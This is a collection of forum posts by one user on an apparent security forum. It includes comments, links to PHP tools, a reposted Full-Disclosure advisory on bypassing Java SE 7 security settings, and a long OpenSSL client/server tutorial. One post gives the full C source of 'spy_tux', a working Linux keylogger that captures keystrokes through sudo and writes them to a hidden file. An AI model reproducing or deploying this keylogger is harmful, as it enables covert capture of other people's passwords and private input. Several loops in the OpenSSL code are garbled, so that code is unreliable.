Everything posted by Nytro
-
And you're saying you made it yourself?
-
New Techniques In Sqli Obfuscation: Sql Never Before Used In Sqli
Nytro replied to Praetorian503's topic in Video tutorials
Quote: Q: "Why don't we see more attacks using these techniques?" A: "Dumb attacks work (for now)"
-
Online Tools and Online PHP Tools, I found a few useful ones.

Online PHP functions: strlen, base64_encode, base64_decode, htmlspecialchars, ip2long, long2ip, md5, crc32, nl2br, sha1, str_rot13, urlencode, urldecode, addslashes, stripslashes, strip_tags, trim, pathinfo, dirname, basename, date, date_parse, Trigonometric functions

http://www.tools4noobs.com/online_tools/
http://www.tools4noobs.com/online_php_functions/
-
Brilliant
-
An issue with new Java SE 7 security features
From: Security Explorations <contact () security-explorations com>
Date: Sun, 27 Jan 2013 11:01:50 +0100

Hello All,

According to Oracle's Java security head, the company has recently made "very significant" security improvements to Java, such as to prevent silent exploits. The problem is that "people don't understand those features yet" [1].

Starting from Java SE 7 Update 10 released in Oct 2012, a user may control the level of security that will be used when running unsigned Java apps in a web browser [2][3]. Apart from being able to completely disable Java content in the browser, the following four security levels can be used for the configuration of unsigned Java applications:

- Low: Most unsigned Java apps in the browser will run without prompting unless they request access to a specific old version of JRE or to protected resources on the system.
- Medium: Unsigned Java apps in the browser will run without prompting only if the Java version is considered secure. User will be prompted if an unsigned app requests to run on an old version of Java.
- High: User will be prompted before any unsigned Java app runs in the browser. If the JRE is below the security baseline, user will be given an option to update.
- Very High: Unsigned (sandboxed) apps will not run.

Unfortunately, the above is only a theory. In practice, it is possible to execute unsigned (and malicious!) Java code without a prompt corresponding to security settings configured in Java Control Panel.

What we found out and what is a subject of a new security vulnerability (Issue 53) is that unsigned Java code can be successfully executed on a target Windows system regardless of the four Java Control Panel settings described above.

Our Proof of Concept code that illustrates Issue 53 has been successfully executed in the environment of latest Java SE 7 Update 11 (JRE version 1.7.0_11-b21) under Windows 7 OS and with "Very High" Java Control Panel security settings.

That said, recently made security "improvements" to Java SE 7 software don't prevent silent exploits at all. Users that require Java content in the web browser need to rely on a Click to Play technology implemented by several web browser vendors in order to mitigate the risk of a silent Java Plugin exploit.

Thank you.

Best Regards
Adam Gowdiak
---------------------------------------------
Security Explorations
http://www.security-explorations.com
"We bring security research to the new level"
---------------------------------------------

References:
[1] Oracle's Java security head: We will 'fix Java,' communicate better
http://www.computerworld.com/s/article/9236230/Oracle_s_Java_security_head_We_will_fix_Java_communicate_better
[2] Setting the Security Level of the Java Client
http://docs.oracle.com/javase/7/docs/technotes/guides/jweb/client-security.html
[3] Understanding the new security in Java 7 Update 11 by Michael Horowitz
http://blogs.computerworld.com/cybercrime-and-hacking/21664/understanding-new-security-java-7-update-11

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Source: Full Disclosure: [SE-2012-01] An issue with new Java SE 7 security features
-
It's uglier than the programs I made. But if you made it yourself, even with the whole "keylogging" part copy/pasted, it's ok.
-
And the source, since it's open-source anyway:

```c
/*
 *Author :Tharindra Galahena
 *Project:spy_tux - keylogger for linux
 *Date :29/07/2012
 *
 *
 *
 * Copyright 2012 Tharindra Galahena
 *
 * This file is part of spy_tux.
 *
 * spy_tux is free software: you can redistribute it and/or modify it under the terms of
 * the GNU General Public License as published by the Free Software Foundation, either
 * version 3 of the License, or any later version. spy_tux is distributed in the hope
 * that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
 * Public License for more details.
 *
 * You should have received a copy of the GNU General Public License along with spy_tux.
 * If not, see http://www.gnu.org/licenses/.
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/types.h>
#include <unistd.h>
#include <linux/input.h>
#include <pthread.h>
#include <signal.h>
#include <string.h>
#include <sys/wait.h>

//the path of your event file for the keybord. most probably it is the same a this
#define event_path "/dev/input/event3"
#define pass_word "god created a1pha and 0mega" //admin password of the computer
#define data_file "/home/tharindra/.data"      //path of the .data file
#define keys_file "/home/tharindra/.keys"      //path of the .keys file

char keys[242][20];
FILE *data;
pthread_mutex_t mutex;

void print_stamp(){
    time_t now;
    char *ti = (char *)malloc(100);
    time(&now);
    strcpy(ti, (char *)ctime(&now));
    ti[strlen(ti) - 1] = '\0';
    pthread_mutex_lock(&mutex);
    fprintf(data, "\n%s : ", ti);
    fflush(data);
    pthread_mutex_unlock(&mutex);
    free(ti);
}

void signal_heandle(){
    print_stamp();
    fprintf(data, "-------------------end------------------------\n");
    fclose(data);
    exit(0);
}

void read_file(){
    FILE *kf = fopen(keys_file, "r");
    if(kf == NULL){
        print_stamp();
        fprintf(data, "ERROR : keys file missing\n");
        exit(0);
    }
    char line[40];
    int i;
    for(i = 0; fgets(line, 30, kf) > 0 && i < 242; i++){
        line[strlen(line) - 1] = '\0';
        strcpy(keys[i], line);
    }
    fclose(kf);
}

void *th(void *arg){
    while(1){
        print_stamp();
        sleep(30);
    }
}

void keylog_init(){
    int pfds[2];
    int pfds2[2];
    data = fopen(data_file, "a+");
    if(pipe(pfds) == -1){
        print_stamp();
        fprintf(data, "ERROR : pipe error\n");
        exit(0);
    }
    if(pipe(pfds2) == -1){
        print_stamp();
        fprintf(data, "ERROR : pipe error\n");
        exit(0);
    }
    if (!fork()) {
        if (!fork()){
            close(1);
            dup(pfds2[1]);
            close(pfds2[0]);
            execlp("echo", "echo", pass_word, NULL);
        }else{
            wait(NULL);
            close(0);
            dup(pfds2[0]);
            close(1);
            dup(pfds[1]);
            close(pfds[0]);
            close(pfds2[1]);
            execlp("sudo", "sudo", "-S", "cat", event_path, NULL);
        }
    }else{
        pthread_t pth;
        struct input_event *in;
        char *buff;
        pthread_mutex_init(&mutex, NULL);
        print_stamp();
        fprintf(data, "------------------start-----------------------\n");
        fflush(data);
        read_file();
        pthread_create(&pth, NULL, th, NULL);
        while (1){
            buff = (char *)malloc(sizeof(struct input_event) * 64);
            read (pfds[0], buff, sizeof(struct input_event) * 64);
            read (pfds[0], buff, sizeof(struct input_event) * 64);
            in = (struct input_event *)buff;
            if(in -> value < 241) {
                pthread_mutex_lock(&mutex);
                fprintf(data, "%s ", keys[in -> value]);
                fflush(data);
                pthread_mutex_unlock(&mutex);
            }
            free(buff);
        }
    }
    fflush(data);
}

int main(void){
    if(!fork()){
        signal(SIGINT | SIGPWR, signal_heandle);
        keylog_init();
    }else{
        printf("\n---spy_tux started!---\n");
    }
    return 0;
}
```
-
All-OS-OpenSSL-client-threaded-server-example
Example-C OpenSSL client and server example

EXAMPLE TEMPLATE

PRODUCT: OpenSSL Version 0.9.8a 11 Oct 2005
OP/SYS: Windows XP SP2, OpenVMS Alpha V8.2, Linux Fedora Core 5, HP-UX 11i
COMPONENT: OpenSSL run-time libraries and tools
SOURCE: Philippe Vouters, Fontainebleau/France
LOW COST HIGH-TECH PRODUCTS: http://techno-star.fr

DOWNLOAD LINKS:
OpenSSL for OpenVMS (Itanium, Alpha, VAX) can be downloaded from HP OpenVMS Systems.
OpenSSL for HP-UX can be downloaded from http://h20293.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=OPENSSL11I
OpenSSL for Windows can be downloaded from OpenSSL - Download OpenSSL - SSL, TLS, and a cryptography library. Perl or Cygwin needed for Win32 compile.
For you to simply execute the code shown hereafter, you may download: ../zip/bio_html.tar.gz

OVERVIEW:
This document shows a set of OpenSSL multi-threaded servers and a single-threaded client that demonstrate a way to secure TCP/IP traffic using OpenSSL encryption. Unlike conventional TCP/IP traffic, the OpenSSL traffic cannot be decoded even by Ethereal. The RSA key is checked by the servers and the X509 certificate is exchanged with the dedicated remote client in the following example. The sslserver.c code for OpenVMS and Unixes is also able to accept connections on user-specified network IP interfaces. See its code in the main routine body part.

*** CAUTION ***
These sample programs have been tested using Linux Fedora Core 5, OpenVMS Alpha V8.2, Windows XP and HP-UX B.11.11. However, we cannot guarantee their effectiveness because of the possibility of error in transmitting or implementing them. They are meant to be used as a template for writing your own programs, and may require modification for use on your system.

PROGRAMS NOTES:

On Windows:
  Add C:\openssl\include to the INCLUDE environment variable
  Add C:\openssl\lib to the LIB environment variable
  Add C:\openssl\bin to the PATH environment variable
  Enter the following command:
  C:\> nmake

On Unix:
  $ gmake -f makefile_unix
  You can eventually do the following command prior to gmake:
  $ export USE_PTHREAD_KILL=yes
  Without this export, this uses the pthread_cancel()/pthread_testcancel() calls. You may also
  $ export BAD_PRACTICE=yes
  Running the code with this above export defined emits a warning.

On OpenVMS:
  $ @makefile

Use the following syntax to generate two pem files prior to executing the programs, each on one terminal:

On OpenVMS:
  $ openssl :== $SSL$EXE:openssl
  $ openssl req -newkey rsa:1024 -x509 -keyout key.pem -out root.pem -
  -config /ssl$root/openssl-vms.cnf
  Edit root.pem so that the first and last lines appear as follows if the above command is not generating the certificate header correctly:
  -----BEGIN CERTIFICATE-----
  -----END CERTIFICATE-----
  This should be done when using the following:
  $ openssl version
  OpenSSL 0.9.6g [engine] 9 Aug 2002

On Windows:
  C:\> openssl req -newkey rsa:1024 -x509 -keyout key.pem -out root.pem -config \openssl\apps\openssl.cnf
  The -config option is at least necessary under the following:
  C:\Documents and Settings\vouters>openssl version
  OpenSSL 0.9.7c 30 Sep 2003

Use the following command on Unix:
  $ openssl req -newkey rsa:1024 -x509 -keyout key.pem -out root.pem
  Generating a 1024 bit RSA private key
  ......................++++++
  ..............................................++++++
  writing new private key to 'key.pem'
  Enter PEM pass phrase:< this must match the const char *pass in sslserver.c or the #define PASSWORD in sslserver_windows.c >
  Verifying - Enter PEM pass phrase:
  -----
  You are about to be asked to enter information that will be incorporated
  into your certificate request.
  What you are about to enter is what is called a Distinguished Name or a DN.
  There are quite a few fields but you can leave some blank
  For some fields there will be a default value,
  If you enter '.', the field will be left blank.
  -----
  Country Name (2 letter code) [GB]:<2 letters country mnemonic>
  State or Province Name (full name) [Berkshire]:<your State or Province>
  Locality Name (eg, city) [Newbury]:<your town's name>
  Organization Name (eg, company) [My Company Ltd]:<the name of your company>
  Organizational Unit Name (eg, section) []:
  Common Name (eg, your name or your server's hostname) []:localhost   <-- < Important because bio_html request is https://localhost:60000/ >
  Email Address []:<your email address>

Concatenate the two resultant files key.pem and root.pem into server.pem:

On Unix:
  $ cat key.pem root.pem > server.pem
On VMS:
  $ copy/concatenate key.pem,root.pem server.pem
On Windows:
  C:\> copy key.pem/A + root.pem/A server.pem/A

Type the following on one terminal. Parameters between square brackets are optional. If no parameters are supplied the program binds to 0.0.0.0:60000. The optional IP Interface parameter is the IPv4 address of the computer's network interface you wish to limit the traffic to.

On Unix:
  $ ./sslserver [IP Interface1] ... [IP InterfaceN] [port]
On OpenVMS:
  $ run sslserver
  or
  $ sslserver :== $disk:[directory]sslserver.exe
  $ sslserver [IP Interface1] ... [IP InterfaceN] [port]
On Windows:
  C:\> sslserver_windows

Do the following on another terminal on the same computer:

On Unix:
  $ ./bio_html https://localhost:60000/
On Windows:
  C:\> bio_html https://localhost:60000/
On OpenVMS:
  $ bio_html :== $disk:[directory]bio_html.exe
  $ bio_html https://localhost:60000/

Instead of running the bio_html Web browser emulator, you may use any real Web browser and introduce the following URL: https://host:60000/

To check the certificate aspect, you may use the openssl provided client with the command:
  openssl s_client -connect localhost:60000 -state -showcerts

ALGORITHM:

  CLIENT                                  SERVERS
  ___________________________________________________________
  TCP/IP connect     ---------->          TCP/IP accept
  SSL_connect        ---------->          SSL_accept
  SSL_write          ---------->          SSL_read
  SSL_read           <----------          SSL_write (echo)
  SSL_read                                SSL_read

  two scenarios:
  either (case close SSL connection from the Web browser)
  BIO_free_all       ---------->          SSL_read returning 0
                                          BIO_free_all (this shuts down and closes the socket)
  or (socket activity timeout in the sslserver)
  SSL_read           <----------          BIO_free_all
                                          SSL_shutdown
                                          close socket

ADVICE:
If you are running VMS or any Unix, you will need the sslserver.c. This code is over-documented, hiding the actual code. With the comments he got, the author of this article feels it necessary to strongly document the solution. Also, as the same C source file runs on many platforms, each having different possibilities and constraints, there is a lot of conditional preprocessing (all the #ifdef's). The best advice the author may give the reader is to preprocess this source file. You will then get a C source code containing only C statements that fits your own preprocess conditions. To solely use the preprocessor, you would:

On Linux:
  $ cpp [-DUSE_PTHREAD_KILL [-DBAD_PRACTICE]] -P sslserver.c sslserver.cc
  Each item surrounded by square brackets is optional.
On OpenVMS systems:
  $ cc/preprocess=sslserver.cc/noline sslserver.c

The output preprocessor file is sslserver.cc.
You can edit view it from the bottom and climb lines up to the real start of this sslserver.c code. You will see how simple both OpenSSL and C phtreads programming can summarize using a supported or unsupported way that proves to work running it. To fully appreciate this summary with the preprocessor output, you must have a strong TCP/IP programming culture and not forget OpenSSL is based upon TCP/IP. You should as well possess a strong real-time programming culture on various Real-Time operating systems. The best profile is a programmer with 10 years programming experience whose job nature is either developping code or assisting developers. If you are used to concurrent programming on Windows, the algorythm of the Windows sslserver.c code below is an almost direct translation using Windows programming of the OpenSSL/pthreaded OpenVMS version because the run-time constraints are almost identical. MAKEFILES: ******** * VMS makefile.com ******** $CC/POINTER_SIZE=32/PREFIX_LIBRARY_ENTRIES=ALL_ENTRIES sslserver.C $LINK/THREAD sslserver.OBJ,sys$input:/OPT SYS$LIBRARY:SSL$LIBCRYPTO_SHR32.EXE/SHARE SYS$LIBRARY:SSL$LIBSSL_SHR32.EXE/SHARE $CC/POINTER_SIZE=32/PREFIX_LIBRARY_ENTRIES=ALL_ENTRIES bio_html.C $CC/POINTER_SIZE=32/PREFIX_LIBRARY_ENTRIES=ALL_ENTRIES encode.C $LINK bio_html.OBJ,encode.OBJ,sys$input:/OPT SYS$LIBRARY:SSL$LIBCRYPTO_SHR32.EXE/SHARE SYS$LIBRARY:SSL$LIBSSL_SHR32.EXE/SHARE $exit ******** * Windows XP Makefile ******** PROGRAM1=bio_html PROGRAM2=sslserver_windows DEFINES=/D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_MBCS" CCFLAGS=/c /MD /W3 /GX /O1 /Tc LIBS=libeay32.lib ssleay32.lib kernel32.lib user32.lib advapi32.lib ws2_32.lib LDFLAGS=/LIBPATH:"\openssl\bin" /incremental:yes /subsystem:console OBJS=encode all: $(PROGRAM1).exe $(PROGRAM2).exe $(PROGRAM1).exe: $(PROGRAM1).c $(OBJS).obj cl $(DEFINES) $(CCFLAGS) $(PROGRAM1).c link $(LDFLAGS) $(PROGRAM1).obj $(OBJS) $(LIBS) $(PROGRAM2).exe: $(PROGRAM2).c $(OBJS).obj cl $(DEFINES) $(CCFLAGS) $(PROGRAM2).c link 
$(LDFLAGS) $(PROGRAM2).obj $(LIBS) $(OBJS).obj: $(OBJS).c cl $(DEFINES) $(CCFLAGS) $(OBJS).c clean: - if exist $(PROGRAM1).ilk del $(PROGRAM1).ilk - if exist $(PROGRAM1).obj del $(PROGRAM1).obj - if exist $(PROGRAM2).ilk del $(PROGRAM2).ilk - if exist $(PROGRAM2).obj del $(PROGRAM2).obj - if exist $(OBJS).obj del $(OBJS).obj ******** * Linux and HP-UX Makefile ******** PROGRAM1=bio_html PROGRAM2=sslserver DEFINES_HP-UX=-D_XOPEN_SOURCE_EXTENDED DEFINES_OSF1=-D_OSF_SOURCE=500 -D_XOPEN_SOURCE=500 DEFINES_Linux= CCFLAGS_HP-UX=-mt CCFLAGS_OSF1=-std -pthread CCFLAGS_Linux=-pthread LIBS_HP-UX=-lssl -lcrypto LIBS_Linux=-lssl -lcrypto LIBS_OSF1=-lssl -lcrypto LDFLAGS= OBJS=encode # OS= $(shell uname -a | awk '{print $$1}') CCFLAGS=$(CCFLAGS_$(OS)) LIBS=$(LIBS_$(OS)) DEFINES=$(DEFINES_$(OS)) # ifneq ($(USE_PTHREAD_KILL),) ifneq ($(BAD_PRACTICE),) DEFINES += -DBAD_PRACTICE endif DEFINES += -DUSE_PTHREAD_KILL endif all: $(PROGRAM1) $(PROGRAM2) $(PROGRAM1): $(PROGRAM1).c $(OBJS).o $(CC) -o $(PROGRAM1) $(DEFINES) $(CCFLAGS) $(OBJS).o $(LIBS) $(PROGRAM1).c $(PROGRAM2): $(PROGRAM2).c $(CC) -o $(PROGRAM2) $(DEFINES) $(CCFLAGS) $(LIBS) $(PROGRAM2).c $(OBJS).o: $(OBJS).c $(CC) -c $(OBJS).c clean: rm -f *.o $(PROGRAM1) $(PROGRAM2) *********** PROGRAMS: ******** * sslserver.c for Linux/HP-UX and OpenVMS ******** /* * ? Copyright 1976, 2005 Hewlett-Packard Development Company, L.P. * * Confidential computer software. Valid license from HP and/or * its subsidiaries required for possession, use, or copying. * * Consistent with FAR 12.211 and 12.212, Commercial Computer Software, * Computer Software Documentation, and Technical Data for Commercial * Items are licensed to the U.S. Government under vendor's standard * commercial license. * * Neither HP nor any of its subsidiaries shall be liable for technical * or editorial errors or omissions contained herein. The information * in this document is provided "as is" without warranty of any kind and * is subject to change without notice. 
The warranties for HP products * are set forth in the express limited warranty statements accompanying * such products. Nothing herein should be construed as constituting an * additional warranty. */ #include <errno.h> #include <sys/types.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> /* change hostent to comply with BSD 4.3 */ #include <arpa/inet.h> #include <pthread.h> #include <signal.h> #include <openssl/ssl.h> #include <openssl/err.h> #ifdef __VMS #include <unixio.h> #else #include <unistd.h> #endif #if defined (_XOPEN_SOURCE_EXTENDED) && defined (__hpux) #include <sys/byteorder.h> #endif #ifndef PTHREAD_STACK_MIN /* * PTHREAD_STACK_MIN is undefined on my SunOS V5.8 * likely due to out dated patches. */ #define PTHREAD_STACK_MIN 65535 #endif #if !defined (USE_PTHREAD_KILL) && defined (BAD_PRACTICE) /* * BAD_PRACTICE is only valid with USE_PTHREAD_KILL */ #undef BAD_PRACTICE #endif const int AUXSERVER_PORT=60000; const int MAX_MESSAGE_SIZE=50000; const char *KEYFILE="server.pem"; const char *CA_LIST="root.pem"; const char *HTML_PREFIX="HTTP/1.1 200 OK\n\ Content-Type:text/html\n\n\ <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">\n\ <HTML>\n\ <HEAD>\n\ <TITLE>sslserver echo</TITLE>\n\ <META HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html; charset=iso-8859-1\">\n\ </HEAD>\n\ <BODY>\n\ <PRE>\n"; const char *HTML_SUFFIX="</PRE>\n\ </BODY>\n\ </HTML>\n"; #if defined (__VMS) #define socklen_t unsigned int #endif /* * A printf is not guaranteed to be atomic on all systems. 
* Hence the ScreenMutex */ pthread_mutex_t ScreenMutex; const char *pass="password"; #if defined (BAD_PRACTICE) /* * The #warning preprocessor directive is Linux specific */ void warning(void){ printf ("******** WARNING **********\n"); #if defined (__osf__) printf ("pthread_sigmask has an undefined behavior in \ signal-handling functions on Tru64\n"); #endif printf("pthread_exit has an undefined behavior in signal-handling functions.\n\ It is better advised to not -DBAD_PRACTICE.\n\ This call in the context of this program appears to behave correctly on \n\ Linux FC5, HP-UX 11iV1, HP Tru64 V5.1B PK4\n"); printf ("\nRead comments in SIGUSR1_handler routine\n\n"); printf ("***************************\n"); } #endif static int password_cb(char *buf,int num,int rwflag, void *userdata) { if (num<strlen(pass)+1) return 0; strcpy(buf,pass); return(strlen(pass)); } typedef struct { int s; int http_request; SSL *ssl; BIO *sbio; char *message; pthread_t connection_thread; pthread_t watchdog_thread; #if !defined (USE_PTHREAD_KILL) || defined (BAD_PRACTICE) int signalled; /* to handle possible spurious wakeups */ pthread_mutex_t mutex; pthread_cond_t cond; #endif } arg_t; /* * Small error handling routine, that prints out the error, plus OpenSSL * relevant information upon why the call failed. */ void berr_exit(char *str){ fprintf(stderr,"%s\n",str); ERR_print_errors_fp(stderr); exit(EXIT_FAILURE); } void finish(void *ptr){ arg_t *arg =(arg_t *)ptr; int retval; /* * Shutdown SSL connection and close socket. */ if (arg->http_request) SSL_write(arg->ssl,HTML_SUFFIX,strlen(HTML_SUFFIX)); if (arg->message) free(arg->message); BIO_free_all(arg->sbio); /* * wait until watchdog thread has termined. * If the SSL_accept returns in error (because * one specify http instead of https), it calls * pthread_exit which will invoke this * finish routine. As the *arg is allocated in main * with a calloc, arg->watchdog_thread will be NULL. * Free used resources. 
*/ if (arg->watchdog_thread){ /* * Unlocking a mutex which is unlocked can yield to * unpredictable results. The mutex is locked again * after the pthread_cond_timedwait and is * unlocked in case of timeout. */ #if defined (BAD_PRACTICE) /* * a pthread_kill on a pthread_cond_wait has an * undefined behavior regarding the mutex lock. */ pthread_mutex_trylock(&arg->mutex); #endif #if !defined (USE_PTHREAD_KILL) || defined (BAD_PRACTICE) pthread_mutex_unlock(&arg->mutex); #endif pthread_join(arg->watchdog_thread,NULL); } #if !defined (USE_PTHREAD_KILL) || defined (BAD_PRACTICE) pthread_mutex_destroy(&arg->mutex); pthread_cond_destroy(&arg->cond); #endif free(arg); } #if defined (BAD_PRACTICE) void SIGUSR1_handler(int sig){ /* * Here is a good description in the book THREADTIME * (see the REFERENCE section) * From CHAPTER 7 * Threads and Signals * Async-Signal Safe Thread Functions * 2nd paragraph. * =================== * * pp. 181: * * What is an async-signal safe function? It is a function that may be * invoked from a signal handler. No function should be considered * async-signal safe unless it is explicitly stated to be safe. * * None of the pthread_*() functions are async-signal safe. Do not call any * of these functions from within a signal handler. Initially, this may not * seem like a severe restriction. However, a thread may want to terminate * upon receipt of a specific signal. A thread cannot safely call * pthread_exit() from a signal handler. * ==================== * * See also: * * http://mailgate.supereva.com/comp/comp.programming.threads/msg12068.html * * From the following URL: * http://www.calpoly.edu/cgi-bin/man-cgi?sigaction+2 * * The following table defines a set of functions that are either * reentrant or not interruptible by signals. 
Therefore * applications may invoke them, without restriction, from * signal-catching functions: * * So what about adding the following small code before pthread_exit to prevent it * from being interruptible by signals ? sigset_t set; sigfillset(&set); sigprocmask(SIG_BLOCK,&set,NULL); * * On Linux FC5, the following is specified: * The use of sigprocmask() is unspecified in a multithreaded process; * see pthread_sigmask(3). * The (pthread_sigmask) function shall be equivalent to sigprocmask(), * without the restriction the call be made in a single-threaded process. * * On HP-UX, man sigprocmask specifies the following: * APPLICATION USAGE * Threads Considerations * Since each thread maintains its own blocked signal mask, sigprocmask() * modifies only the calling thread's blocked signal mask. * * For more information regarding signals and threads, refer to * signal(5). * * LWP (Lightweight Processes) Considerations * sigprocmask() modifies only the calling LWP's blocked signal mask. * * On Tru64 V5.1B, man 4 signal indicates: * * When signal-catching functions are invoked asynchronously with process exe- * cution, the behavior of some of the functions defined by this standard is * unspecified if they are called from a signal-catching function. 
The fol- * lowing set of functions are reentrant with respect to signals (that is, * applications can invoke them, without restriction, from signal-catching * functions): * * _exit() access() alarm() chdir() * chmod() chown() close() creat() * dup2() dup() exec() fcntl() * fork() fstat() getegid() geteuid() * getgid() getgroups() getpgrp() getpid() * getppid() getuid() kill() link() * lseek() mkdir() mkfifo() open() * pause() pipe() read() rename() * rmdir() sem_post() setgid() setpgrp() * setuid() sigaction() sigaddset() sigdelset() * sigfillset() siginitset() sigismember() signal() * sigpending() sigprocmask() sigsuspend() sleep() * statx() tcdrain() tcflow() tcflush() * tcgetattr() tcgetprgp() tcsendbreak() tcsetattr() * tcsetpgrp() time() times() umask() * uname() unlink() ustat() utime() * wait2() wait() write() * * All other system calls should not be called from signal-catching functions * since their behavior is undefined. * * Still on Tru64, man sigprocmask shows it acts on process whereas pthread_sigmask * acts on a thread. * How useful a pthread_kill can be on Tru64 unless it is used with a sigwait ??? */ sigset_t set; sigfillset(&set); #if defined (__hpux) sigprocmask(SIG_BLOCK,&set,NULL); #elif defined (__linux__) pthread_sigmask(SIG_BLOCK,&set,NULL); #elif defined (__osf__) pthread_sigmask(SIGBLOCK,&set,NULL); #endif pthread_exit(NULL); } /* * The pthread_cond_timedwait can be interrupted by a SIGUSR1 signal * from the the serve_connection thread. * This call is NOT async-signal safe. The pthread_exit inside the * SIGUSR1_handler also not being async-signal safe, this leads to an * undefined behavior on all Unixes including Linux. */ void *connection_watchdog(void *ptr){ arg_t *arg =(arg_t *)ptr; struct timespec delta; struct timespec abstime; int ret; struct timeval tm; /* * On Unix systems the signal mask is inherited from its creator. * As we pthread_kill(this_thread,SIGUSR1), unblock this signal. 
*/ sigset_t set; sigemptyset(&set); sigaddset(&set,SIGUSR1); pthread_sigmask(SIG_UNBLOCK,&set,NULL); delta.tv_sec=2; delta.tv_nsec=0; for ({ gettimeofday(&tm,NULL); abstime.tv_sec = delta.tv_sec+tm.tv_sec; abstime.tv_nsec = delta.tv_nsec+tm.tv_usec*1000; if (abstime.tv_nsec >= 1000000000){ ++abstime.tv_sec; abstime.tv_nsec -= 1000000000; } pthread_mutex_lock(&arg->mutex); /* * From HP-UX pthread_cond_timedwait man * Spurious wakeups may occur when waiting on * a condition variable. A spurious wakeup occurs when a thread returns * from a condition wait when it should really continue waiting. A normal * signal being delivered to a thread may cause a spurious wakeup during * a condition wait. Since the return values from pthread_cond_wait() * and pthread_cond_timedwait() do not imply anything about the value of * the predicate, the predicate should be re-evaluated. * */ ret=0; while ((!arg->signalled) && (ret==0)) ret=pthread_cond_timedwait(&arg->cond,&arg->mutex,&abstime); arg->signalled=0; /* * If timeout elapsed, just cancel the serve_connection thread * It shall do socket cleanups */ if (ret==ETIMEDOUT){ pthread_kill(arg->connection_thread,SIGUSR1); return(NULL); } pthread_mutex_unlock(&arg->mutex); } } #else /* Good pratice */ #if !defined (USE_PTHREAD_KILL) void *connection_watchdog(void *ptr){ arg_t *arg =(arg_t *)ptr; struct timespec delta; struct timespec abstime; int ret; struct timeval tm; delta.tv_sec=2; delta.tv_nsec=0; for ({ gettimeofday(&tm,NULL); abstime.tv_sec = delta.tv_sec+tm.tv_sec; abstime.tv_nsec = delta.tv_nsec+tm.tv_usec*1000; if (abstime.tv_nsec >= 1000000000){ ++abstime.tv_sec; abstime.tv_nsec -= 1000000000; } pthread_mutex_lock(&arg->mutex); /* * From HP-UX pthread_cond_timedwait man * Spurious wakeups may occur when waiting on * a condition variable. A spurious wakeup occurs when a thread returns * from a condition wait when it should really continue waiting. 
A normal * signal being delivered to a thread may cause a spurious wakeup during * a condition wait. Since the return values from pthread_cond_wait() * and pthread_cond_timedwait() do not imply anything about the value of * the predicate, the predicate should be re-evaluated. */ ret=0; while ((!arg->signalled) && (ret==0)) ret=pthread_cond_timedwait(&arg->cond,&arg->mutex,&abstime); arg->signalled=0; /* * If timeout elapsed, just cancel the serve_connection thread * It shall do socket cleanups */ if (ret==ETIMEDOUT){ pthread_cancel(arg->connection_thread); return(NULL); } pthread_mutex_unlock(&arg->mutex); }/*end for */ } #else /* good practice and use pthread_kill */ void *connection_watchdog(void *ptr){ arg_t *arg =(arg_t *)ptr; /* * A good practice when using signals in multi-threaded application * is to use the pthread_kill/pthread_sigmmask/sigwait. No other calls * should be considered. * CAUTION: * Special care ought to be taken with such a method which indeed works * fine as long as there is one client of this threaded server. This is * because the SIGALRM signal raised by alarm in this case ought to be common * to all threads that run this code. The signal handling by Unix is very * likely not thread-safe, but only process-safe. */ sigset_t set; int sig; sigemptyset(&set); sigaddset(&set,SIGUSR1); sigaddset(&set,SIGALRM); sigaddset(&set,SIGUSR2); for({ alarm(2); sigwait(&set,&sig); alarm(0); switch (sig){ case SIGUSR2: continue; case SIGALRM: pthread_cancel(arg->connection_thread); case SIGUSR1: return(NULL); } } } #endif /* #else !defined (USE_PTHREAD_KILL) */ #endif /* else defined (BAD_PRACTICE) */ /* * This is our per socket thread. */ void *serve_connection (void *ptr){ arg_t *arg =(arg_t *)ptr; pthread_attr_t attr; int len=0; char *current_cipher_name; #if defined (__VMS) struct timeval timeout={0,10000}; fd_set rmask; #endif #if defined (BAD_PRACTICE) sigset_t set; /* * On Unix systems the signal mask is inherited from its creator. 
*/ sigemptyset(&set); sigaddset(&set,SIGUSR1); #endif pthread_cleanup_push(finish,ptr); /* * initialize the synchronization pthread mutex * and condition. */ #if !defined (USE_PTHREAD_KILL) || defined (BAD_PRACTICE) /* * Synchronization needed for the pthread_cond_timedwait * These two calls must occur once the finish cleanup handler * has been established and before any pthread_exit/pthread_testcancel * or the creation of the watchdog timer which may pthread_kill this thread. * Doing this initialization here is safe. */ pthread_mutex_init(&arg->mutex,NULL); pthread_cond_init(&arg->cond,NULL); #endif /* * Complete the SSL connection from the remote peer. */ arg->sbio=BIO_new_socket(arg->s,BIO_CLOSE); SSL_set_bio(arg->ssl,arg->sbio,arg->sbio); /* * Choose the encryption algorythm by selecting a cipher. * As bio_html is a SSL V2 client, one must choose a sslv2 cipher. * To get available ciphers to choose for this application, enter the * command: * openssl ciphers -v -ssl2 * The DES-CBC3-MD5 cipher is a sslv2 cipher and can only be used * with a sslv2 client. * Here we let the client chose its cipher or have OpenSSL chose one * during the SSL_accept/SSL_connect negociation. */ /* if (SSL_set_cipher_list(arg->ssl,"DES-CBC3-MD5") <= 0) berr_exit("cipher could not be set"); */ /* * This server will send its X509 certificate to the client when the * connection is accepted, but using SSL_VERIFY_NONE, this program does * not require a certificate from the remote SSL peer. */ SSL_set_verify(arg->ssl,SSL_VERIFY_NONE,NULL); /* * Do accept the SSL connection. */ if ((len=SSL_accept(arg->ssl))<=0){ fprintf(stderr,"SSL accept error\n"); ERR_print_errors_fp(stderr); pthread_exit(NULL); } current_cipher_name=(char *)SSL_get_cipher_name(arg->ssl); pthread_mutex_lock(&ScreenMutex); printf("Using cipher %s\n",current_cipher_name); pthread_mutex_unlock(&ScreenMutex); /* * Start the connection activity watchdog. 
     */
    pthread_attr_init(&attr);
    /*
     * This call is not necessary as it is a default. However it is
     * there to highlight the fact we pthread_join the watchdog thread
     * in the finish cleanup handler.
     */
